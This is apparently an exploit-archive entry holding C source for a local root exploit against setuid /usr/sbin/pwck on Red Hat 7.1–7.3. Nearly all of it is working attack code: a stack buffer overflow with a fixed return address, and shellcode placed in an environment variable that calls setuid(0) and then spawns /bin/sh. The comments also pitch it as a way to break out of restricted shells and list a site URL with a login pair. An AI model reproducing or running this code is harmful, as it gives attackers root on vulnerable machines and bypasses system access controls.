/usr/sbin/pwck local root exploit for linux. Affects only +s pwck, remember though its a good way to break free from restricted shells - even to the same UID. Tested on Red Hat 7.1, 7.2, and 7.3.
b75ad70961e03feeb4b123acf7bf9b70259f02d79f6d5b5aa604e838ec59e647
/* /usr/sbin/pwck local root exploit for linux */
/* Effects only +s on pwck */
/* Remember though its a good way to break free */
/* from restricted shells - even to the same UID*/
/* http://oakey.no-ip.com:82/uk2sec/ */
/* kiddie:password */
/* c0w_d0g3@yahoo.co.uk */
/* Tested on Redhat 7.1/2/3 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main()
{
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
char buffer[3000];
long retaddr = 0xbfffffa1;
int padding = 2400;
char shell[512];
printf("\nuk2sec c0w_d0g3");
printf("\nThis is a local exploit for /usr/bin/pwck\n");
printf("Satic return address is at : %x\n\n", retaddr);
/* Building the buffer */
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',padding); //size of buffer
*(unsigned long *)(buffer+strlen(buffer))=retaddr; //return address
memset(shell,0x90,100);
memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
execl("/usr/sbin/pwck", "pwck", buffer, 0);
/* uid pwck +s */
}